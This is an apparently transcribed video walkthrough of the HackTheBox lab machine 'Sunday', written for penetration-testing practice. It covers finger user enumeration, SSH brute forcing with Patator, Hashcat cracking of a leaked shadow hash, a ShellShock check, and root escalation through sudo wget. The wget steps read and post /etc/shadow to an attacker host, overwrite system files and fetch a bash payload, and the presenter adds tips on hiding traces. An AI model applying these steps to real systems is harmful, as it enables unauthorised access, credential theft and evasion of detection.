What's going on YouTube? This is Ipsec. I'm doing Sunday from HackTheBox, which is a relatively easy and straightforward box as long as you did not rule out guessing a user's password. It starts off with the finger port being open, which allows you to enumerate the box's hostname and users on the box. Box's hostname is Sunday, the user is Sunny, so you can guess Sunny Sunday may be a user you want to try to log in with via SSH. If you think that's a bit puzzly, you can always brute force it. It's an easy password. Hydra will not work. I think it's because of an old SSH key exchange algorithm, but a tool called Patator does, or I can't pronounce that tool's name, but we'll show it and how you could brute force SSH if you didn't want to guess. Once you log into the box, all the other Privesks are relatively straightforward, so let's just jump in and do this. As always, let's nmap the box, so nmap-sc for default scripts, sv enumerate versions, OA output all formats, put in the nmap directory and call it Sunday. Then the IP address, which is 10.10.10.76. It does take some time to run, so I've already run it. Looking at the results, we don't really have that many ports open. The most interesting thing I see right off the bat is it is a Sun Solaris box, which is kind of another form of Unix or BSD. I don't know exactly what it's based off of, but it's very similar to Linux. We see the Finger services open on port 79 and RPC bind on port 111. I'm going to start off with this Finger service because Finger tells you like what users are logged into the system or have logged into the system. It's just a very old service that we can do some cool enumeration with. And while that goes, I'm actually going to start another nmap just because of how few ports we have to scan all the ports. So we're going to do nmap-p-10.10.10.76, and I want to do OA, we'll call this all ports.nmap. And we're going to see its estimated time is going to be pretty long. It doesn't even have it yet. So to speed this up, I'm just going to do a --max-retries and set that to 1. So that should speed the scan up considerably. And we can go on and enumerate Finger. There's two programs I normally use to enumerate Finger. It's either Metasploit, and we'll start off with that. So we'll do msfdb run. This is just like MSF console, but it's going to start the database and then enter Metasploit. And the second one is a Perl script. So while Metasploit opens up, we can Google it, Finger Enum, and go to Pentest Monkey. Let's see, we want to grab Finger-User-Enumeration. Actually, it's on GitHub right here. Second link. So I will clone that so we have it ready for after Metasploit, and I want to show the difference between the two. So I'm going to search Metasploit for Finger, and then we're going to use it. So auxiliary scanner, Finger users, show the options, set our host to 10.10.10.76, and run it. And all Metasploit does is tell us the found users. Finger actually can return more information, so if we go over to the thing we had just cloned and run it, we can see the options. We're going to want to do -U because it's a file of usernames, and I will put the file in later. I just want to get all the syntax right. -T for the host, 10.10.10.76, and actually I think that's all we have to do. So let's go and find a good user file to do. So user share seclist. If you don't have this directory, you can just install it from apt. I'm going to go to usernames, names, and names.txt sounds good. So replace this file with this directory and names.txt. And this gives extremely long lines that I don't really like because it kind of screws up the output. So I'm going to pipe that to less-S, and this is going to kill off the line wrapping. So it just outputs normally. while that's going on, let's go back and look at our Nmap. It's only about 24% done. It's going pretty slow, so I'm going to turn max retries to 0, and this should speed it up quite a bit. There is a program called Masscan, and I'm not really a huge fan of using Masscan through VPNs just because I find it produces a lot of false positives. It just goes too quick, I guess. But this Nmap should be finished soon. We could do VVV to increase the verbosity and see results as they come in, but almost done, over halfway. So you can see how much time the retries adds to an Nmap scan. I think default is 10. So that's the main reason why it just takes forever, is because it tries 10 different times to make sure it's 100% accurate. Take it down to 0 retries, won't be 100% accurate, but it'll be close enough. So I didn't put that in the Nmap directory, so I'm going to move it in there. And then let's do a targeted Nmap. So nmap-sc for default scripts, sv enumerate versions, -p, and we're going to do 79.111.22022, 35342, and 56272 to identify what these ports are. Then we can do OA and call this targeted ports, and then the IP address. Go back over to our Perl window. We can see this is still finding valid users, and Nmap should be done in a little bit. It's now finished, and we see scripts ran on one of the 3 services, and that is the SSH on port 22022. Looking back at the Finger results, we see they have completed, and it's got a few hits. We got access, admin, Anne-Marie, bin, and a lot of these kind of look odd. Maybe the users never logged in and it just exists. I'm not sure exactly what's going there because I don't think Anne-Marie exists, but we look down and we have Sammy and Sunny, and these lines don't look like the others. We have the usernames, what pseudo terminal they logged into, and the time and the address. So both of these users have SSH'd into the box from the IP of 10.10.14.4. The odd thing here is I don't see a root user. So I'm going to copy this because I think as soon as I exit less, it's going to clear my screen. And I want to just paste what I copied. So we'll do finger.output, paste. And I want to run this command and look at root. So let's see what root looks like since it just wasn't in that word list. So -u, we'll do lowercase so it's not a file. And we see it's very similar. We got the pseudo terminal right here as 3. But instead of an IP, we have the host name, Sunday. So he's probably actually logged in physically to this machine or something since it's showing the host name. So we know the host name is Sunday, and we have users root and Sammy and Sunny. So how I did this box is I was like, well, Sunny Sunday is a thing. So I just tried SSH-P 22022, and we'll do Sunny at 10.10.10.76. We get no matching key exchange method found. And if you look in the man pages of SSH, you know there's -o, key, exchange, algorithms is equal to plus. And we can choose any one of these algorithms. This one's the easiest to copy. So we'll just do Diffie-Hellman group 1 SHA-1. And now it's asking us for the password. And I'm going to guess Sunday. And we get logged in. If you didn't like the guessing, you could do it other ways. So let us just open a new pane. And if we tried Hydra, it's weird. Hydra won't work. So Hydra-U, Sunny-P, Sunday. Then what is it? SSH 10.10.10.76 22022. Unknown service. Let's see, how do we use it for SSH? Maybe -m, then Oh, -L is username, not -U. There we go. And we don't have any valid passwords, even though we know that's a valid password. So maybe it's the key exchange or something. So keep in mind when using Hydra against old services, because the key exchange methods for this box are particularly old. I've noticed it with like old Cisco boxes also have this issue where Hydra just doesn't work and doesn't tell you that it errored out. So I normally use a tool called Patator. I think that's how you pronounce it. So if we do Patator /login, then we can do host is equal to 10.10.10.76, port is equal to 22.0.22, password is equal to file 0, 0 is equal to, we have to get a password file, so let us go user share seclist, go into passwords, and we get a lot of lists here. I'm not using rocku because rocku is huge and it's going to take forever with SSH. So I'm going to do find.-type f, and that's going to list every file in this. I'm going to do -exec wc-l for a word count line, and then open and close squiggly brackets. So it's going to take every entry from find, put it there, and then escape a semicolon to run this. So now we have line counts of every file, and then if I pipe that to sort, we can do -n for number, reverse, and we have line counts for every file. So I'm going to choose one around 1,000 lines, so 1,500 lines is fine. I'm going to grab this one. So file is equal to user share seclist passwords. Okay. And then what else do we need? I like doing the persistent is equal to 0. It's going to slow it down, but I find there's less false positives this way. And then when we hit enter, it's going to spam us with the results and should be getting message denied. That is bizarre. Let's see. What did we screw up? Oh, we don't have a user. So let's do user is equal to Sunny. There we go. Authentication failed. And if we don't want to be spammed by this, we can do Patator-h SSH login, and it gives us a option to ignore message. So -x ignore message is equal to authentication failed, and that will hide things from the message that is authentication failed. Additionally, if you just did failed and put a piece of that line, it's not going to be enough. If you wanted to search for that, you could do fgrep instead of message. And that's going to search for the string failed and exclude it. If you wanted to use a regular expression, you could do egrep. So eventually this will come back and we'll see Sunday is a valid password. But let us continue on the box and do what enumeration we can. So first thing first, let's just run sudo-l, and we see the user Sunny may run the file root troll, so I'm going to execute root troll. And we just see testing, UID equals 0, GID equals 0. So no good information there. If we look at slash, we see a /backup directory, which isn't default in Linux, so I'm going to go look at it. And we have agent22.backup and shadow.backup. Looking at this, we don't have access to read agent22, only shadow. So let us look at shadow. And we get the password hash for Sammy. So if we copy this, we can go into our Kraken go into Hashcat, add this hash, so hash is \Sunday. Make sure I copied it correctly. Yep. And then if we go to Google, we do Hashcat example hashes. And you could also use John to crack this and just specify SHA-256 script, but I pretty much exclusively use Hashcat. I'm guessing it is mode 7400. So I just like this page because it gives example of the hashes, how they should look, and then tells you what mode it is. So Hashcat.mode 7400 hashes Sunday, and we'll do opt wordlist rocku and see if this cracks. And the reason why I'm using rocku for cracking a hash and I didn't do it for the SSH brute force is because it's a lot faster to crack hashes than brute force SSH. And it's already cracked it, so looking at it, we can see Sammy's password is cool dude. Going over the Python, still hasn't found the correct password in that word list. Get out of the Kraken, and we're left with this SSH. We can do su to Sammy, put the password cool dude in, and we log in. And the thing I just noticed when I did su is I see this is a Solaris box from 2008. So I'm going to go back to the Sunday user and just try something out. That something is ShellShock, just because ShellShock came out after 2008, and I've used it to Privesc on other boxes like Sokar. So let's test this. I'm going to create a variable, and the variable name can be anything. We'll do ipsec, and then the ShellShock payload, and we can echo, please subscribe, and then just execute bash with nothing. So it does look like this is vulnerable to ShellShock. If we get rid of this payload here, it doesn't echo please subscribe. So that's how we know that it's executing code. So the next thing is look at sudo again. We don't see it saying any environment variables are being kept, but I'm going to pick one anyways. So if I do env, let's pick one that looks like it would probably be used or not changed. We'll do log name. So log name is equal to ShellShock, then sudo root troll, and if it adds please subscribe to the output, it was vulnerable to ShellShock. Nope, it's not. And I say vulnerable to ShellShock, I meant vulnerable ShellShock through sudo. So let's go back into the Sammy user and begin poking around what he has access to. So sudo-l, and we can see he can run user bin wget. So if we do wget-h, these are all the things we can probably do. And there is one interesting thing that I noticed. Let's see. -i, input file. Download URLs found in file. So if I do sudo wget-i, I can specify any file I want. So if I specify etc shadow, I can read the entire shadow file. I'll just have to awk-print 4. Let's do standard error to standard out. And now we can just grab the shadow file and try to crack the root password. There are other things we can look at, like we could do wget-i root troll, and we see it's just a bash script running echo testing and user bin ID. So the intended way to Privesc this one is to create a file on a box. We'll name this troll, and then just say bash, or we can user bin bash. Start a web server. And then we can sudo wget 10.10.14.2 8000 troll -O to write to a file, root troll, and then exit out, go back to Sunny, who can sudo this file. And that was odd. Let's try this again. Sudo wget 10.10.14.2 root troll, I think there's a task that is writing that file back. This is annoying. Let's just open up a second SSH session to this box. 1076. We have to specify the port and the key algorithm. There we go. Sunday. And now let us just execute this file. Root troll. Wget the file. Sudo wget 10.10.14.2 8000 troll root troll. Put a sleep here. I did not do that quick enough. It'll be better if I just do sleep 5. Get this command ready. And as soon as I see it, wget to execute this. And there we go. We are root. And if we look in the files, we can see a script that runs every single 5 seconds and rewrites root troll, which I guess the name of the script does suffice since it is a pretty big troll. There is another way that I like doing this box better than this file, and that is going back to the Sammy user and creating a script to exfil files and then overwrite shadow. We don't have to do the script to exfil files because we already found the contents of shadow, but the reason why I'm showing this is because it's useful for engagements, and if we didn't have that -I in wget, it shows another thing. Let's look at the options of wget and see if we see anything interesting. The main thing I'm looking for is a way to put files, so we can do what we did in Olympus with curl. And the very first thing I see is post file. So this will put the contents of a file at the end of an HTTP request and make it a post. But I don't see any options for changing the method to a put. If we had that, we could probably add a header to make it a valid put request and do it the same way we did in Olympus. But without that, we're kind of stuck. So we can make a script on our web server to handle a post file. It's just a little more work. So let's go into showing exactly how this works. If we do sudo wget post file, etc shadow, and 10.10.14.2. Let's just do this and start a Python web server. Not Python web server. Let's just start netcat so we can actually see the full request. So we see the request here, post to slash, and then here is the file. So Let's kill the HTTP request, start another netcat up, and we can, instead of just going to 10.10.14.2, we can go to a script that will create, let's say, upload.php, and a argument of the file name. So now we have a post to upload.php. We're sending a argument and the contents of a file. This is something we can actually work with. So let's go create a new directory inside of srv. I just do this because it makes sense to put web files here. So create a PHP directory and upload.php. And this should just be pretty simple. File, put contents, upload. Then we can do request, file name, and then file get contents. This would be what we're sending. And if we just do PHP input, this would be everything at that bottom of the HTTP request. Now, if you're looking at this, you'll notice there's several vulnerabilities in this script. Number one, they can just drop a PHP script and upload, and then execute it. So we can fix that by playing with umask settings, which we'll go into, so they can no longer read what they upload. However, we don't have anything filtering them or stopping them from putting like .. and escaping this upload directory. So I'm going to create a variable, fname, and we're just going to do base name, and then this request. Whoa, that highlighted way too much. And then put weird stuff. That was odd. Highlight this, Control C, paste, and exit base name. So now we just fixed that directory traversal vulnerability. So we can put fname here, if I can type, and that looks a bit better. So let's create the upload directory, and then we can create a file, so touch test, and we can read, write, read, read. So if we chmod this to 222, we can only write to this file. However, because we're root, because we're root, we can still read this file despite the permissions saying we can't. So if we create a new user on this box, let's just call him ip, go into him, and then, do I have right permissions here? I do not. Let's chown ip, upload. Then if we echo please subscribe to test, the file is created with read-write permissions, so I can read that file. If I chmod that to the 2s, I can no longer read it. If we want to make all the files we created on this box only write permission, we can do that with umask, and this takes the, I think, inverse of 777. I think that's the correct thing. So the difference between 555 and 777 is 222. So now any file I touch is going to have permissions 222. So now we got that web server, all the files set up for a web server. We can do the little known thing of using PHP to set up a web server and listen. I can't do port 80 because I'm not a root user and I can't listen to the privileged ports, so I'm just going to do port 8001. And this is very much like the Python HTTP server. The difference being is this can actually execute code if it has .php and has those things. So now we can do this sudo wget post file at shadow to our IP, change it to port 8001, and the file name is shadow. We can see it says it uploaded. If we go to srv php upload, it created that file, and ip's the owner, he can only write to it. So we should be good from any code execution. We could test this by just saying, let's the exploit.php, and we can create a file, php info, and upload this. Exploit.php, and this file will be exploit.php. So now on this, there is a exploit.php file, and if we wget 10.10.14.2 8001 upload exploit.php, is it going to have read permissions to execute this? Nope, it does not. We get a 500 server error, so we should be safe from that aspect. So we can cat shadow, and we see what we expect. So let's edit this, copy the password hash for Sammy, which was cool dude, go up to root, and we will replace his hash. And then copy shadow up a directory, and then chmod it to be 644. So now IP can read and write to shadow. So I can do wget 8001 shadow -O etc shadow. I have to do sudo. And now if I do su dash cool dude, we have the access to root. And then if I was OPSEC conscious, I could just copy this and set his shadow file back to whatever password he was. And it's like we were never there. And if we were extra cautious, we could probably set the timestamp back as well, but we are root, we can see that file. There's other ways you could do this. You could drop things in like cron tab or verspool cron whatever and create a cron entry to execute code. .ssh directory doesn't exist, and I don't know of a way you can make wget through sudo obey a umask, so we couldn't create the .ssh directory and create a SSH key. If we could control umask, you could do something like, let's just stop this web server, exit this. Let's go makedir python makedir.ssh, and then ssh keygen directory sov python ssh sov python ssh id rsa. So now we have that. We can move idrsa.pub to be authorized keys. And then we could probably do something like, let's see, sudo wget -m for mirror. I don't know the change directory one. -h. Let's see, include, exclude, ca directory. Let's see, no, force creation. Okay, we want -P to save to a prefix. So we'll do sudo wget -p /root -m to mirror. And that should be good. TP server. it's on 8,000. So if we look, I don't think that created .ssh on my directory. We have to start this on port 8001 to get the shadow file back because I changed it back. Python m server sudo wget 10 10 14 12 8001 shadow etc shadow. There we go. Cool dude. So it created that. It didn't create .ssh. I wonder where that just saved to. cd/root. Oh, it created 10 10 14 2 8000. And then .ssh. There's a different wget thing to not create that directory. Let's see if we can find that quickly. -N no host directories. So -P -N H. And if we look at root, it created that .ssh. We have all the files we need here to do the SSH key. Unfortunately, the key doesn't have the correct permissions, so this won't work. So we could verify that. Kex algorithm, let's do root and -I to specify the key, sov python ssh idrsa, and we can chmod 600 sov python. So because the permissions are not read-only for the Solaris web server, that method doesn't work. I just wanted to show that you could go and create a directory path if you so needed it. So, hope you guys enjoyed that box. Take care, and I will see you next week.